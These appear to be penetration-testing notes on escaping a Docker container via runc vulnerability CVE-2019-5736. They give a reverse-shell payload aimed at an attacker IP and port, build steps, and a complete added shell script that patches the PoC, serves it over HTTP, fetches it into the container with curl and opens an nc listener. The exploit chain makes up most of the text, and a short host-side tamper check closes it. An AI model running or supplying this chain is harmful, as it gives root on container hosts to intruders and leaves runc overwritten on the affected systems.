5 privesc docker runC exploit
Using https://github.com/Frichetten/CVE-2019-5736-PoC
The vulnerability (CVE-2019-5736) lets a malicious container overwrite the host runc binary and so gain root code execution on the host. The only user interaction required is that someone runs any command as root inside the container, e.g. docker exec into a container the attacker already controls, or starting a container from an attacker-controlled image. The PoC works by replacing the container's /bin/sh with a script whose shebang is #!/proc/self/exe: when runc execs /bin/sh on behalf of that command, the kernel runs runc's own binary as the interpreter, and the PoC (still running inside the container) grabs a file descriptor to that process's /proc/<pid>/exe and writes the payload over the host runc as soon as it is no longer busy.
Update the payload in main.go so it points at your listener (attacker IP and port):

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.2/443 0>&1"

Compile it with go build main.go (the output binary is called main).
Move that binary into the container you want to escape from (you need root in the container, since the PoC has to replace /bin/sh and open runc's /proc/<pid>/exe for writing). Start your listener, then execute the binary; it replaces /bin/sh with #!/proc/self/exe and waits. The next time someone attaches to the container and runs /bin/sh (for example docker exec -it <container> /bin/sh), the host runc binary is overwritten with the payload, which executes as root on the host the next time runc is invoked, and the reverse shell connects back. Note that runc stays overwritten afterwards: every docker run/exec on that host runs the payload instead of runc until the binary is restored from a backup or package.
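The whole procedure above as one shell script. This is an added example, not code from the PoC repository or from the original notes. It assumes the PoC is cloned to ./CVE-2019-5736-PoC, the attacker host is 10.10.14.2 with the listener on port 443 (both overridable via ATTACKER_IP and LPORT), the container can fetch the binary from the attacker over HTTP on port 8000, and go, python3 and nc are installed on the attacker box; all of those are assumptions. The patch_payload function does the main.go edit with sed so the backslash-n and the ampersands inside the Go string literal survive intact.

```shell
#!/bin/sh
# Added example wrapping the steps above (not from the PoC repo).
# Assumptions, hypothetical: PoC cloned to ./CVE-2019-5736-PoC, attacker host
# 10.10.14.2, listener on 443, container can reach attacker:8000 over HTTP.
ATTACKER_IP=${ATTACKER_IP:-10.10.14.2}
LPORT=${LPORT:-443}

# Replace the `var payload = ...` line in main.go with a reverse shell to ip:port.
# main.go holds a literal backslash-n inside the Go string, so the sed replacement
# writes it as \\n and escapes the ampersands (special in a sed RHS) as \&.
patch_payload() {
    file=$1 ip=$2 port=$3
    grep -q '^var payload = ' "$file" || { echo "no payload line in $file" >&2; return 1; }
    rhs="var payload = \"#!/bin/bash \\\\n bash -i >\\& /dev/tcp/${ip}/${port} 0>\\&1\""
    sed "s|^var payload = .*|${rhs}|" "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# Show the payload line currently in main.go (check it before building).
current_payload() {
    grep '^var payload = ' "$1"
}

# Terminal 1 (attacker): patch, build and serve the PoC binary over HTTP.
build_and_serve() {
    dir=${1:-./CVE-2019-5736-PoC}
    patch_payload "$dir/main.go" "$ATTACKER_IP" "$LPORT"
    current_payload "$dir/main.go"
    (cd "$dir" && go build -o main main.go)
    python3 -m http.server 8000 --directory "$dir"
}

# Terminal 2 (attacker): catch the root shell coming back from the host.
listen() {
    nc -lvnp "$LPORT"
}

# Inside the container (paste into the shell you already have there, as root):
# fetch the binary and run it. It swaps /bin/sh for "#!/proc/self/exe" and waits
# for someone on the host to docker exec ... /bin/sh into the container.
stage_in_container() {
    curl -s -o /tmp/main "http://${ATTACKER_IP}:8000/main"
    chmod +x /tmp/main
    /tmp/main
}

case "${1:-}" in
    serve)  build_and_serve "$2" ;;
    listen) listen ;;
    *)      : ;;   # no argument: just define the functions
esac
```

Run sh exploit.sh serve in one terminal and sh exploit.sh listen in another, then paste the three commands from stage_in_container into the shell you already have inside the container. The payload overwrites runc on the host for good: restore it (or reinstall docker/runc) once you have your shell, or every later docker exec/run on that host will execute your payload instead of runc.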
(Screenshots omitted: Terminal-1, Terminal-2, NC listener.)
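The same overwrite is easy to spot from the host side. This is an added defender-side check, not part of the PoC or of these notes: because the PoC replaces the runc ELF binary with a #!/bin/bash script, a tamper check only has to verify that runc still begins with the ELF magic bytes 7f 45 4c 46. The candidate paths are assumptions (override them with RUNC_PATH).

```shell
#!/bin/sh
# Added defender-side check (not part of the PoC): exploitation of CVE-2019-5736
# replaces the host runc ELF binary with a shell script, so the quickest tamper
# test is whether runc still starts with the ELF magic 7f 45 4c 46.
# The default paths are assumptions; set RUNC_PATH to override them.

# Print the first four bytes of a file as lowercase hex, e.g. "7f454c46".
file_magic() {
    head -c 4 "$1" | od -An -tx1 | tr -d ' \n'
}

# Exit 0 if the file is an ELF binary, 1 if something else has been written over
# it (a "#!/bin/bash" payload starts with 23 21 2f 62).
is_elf() {
    [ "$(file_magic "$1")" = "7f454c46" ]
}

# Check every runc-like binary Docker might invoke; exit 1 if any is not ELF.
check_runc() {
    rc=0
    for p in ${RUNC_PATH:-/usr/bin/runc /usr/sbin/runc /usr/bin/docker-runc}; do
        [ -f "$p" ] || continue
        if is_elf "$p"; then
            echo "ok       $p (magic $(file_magic "$p"))"
        else
            echo "TAMPERED $p (magic $(file_magic "$p"), expected 7f454c46)"
            rc=1
        fi
    done
    return $rc
}

check_runc
```

Pair it with package verification (dpkg -V runc or rpm -V runc), since a payload that is itself a valid ELF would pass the magic check. On a patched runc the fix re-execs runc from a sealed in-memory copy of itself, so the /proc/self/exe trick no longer reaches the on-disk binary; the check matters most on hosts that cannot be updated yet.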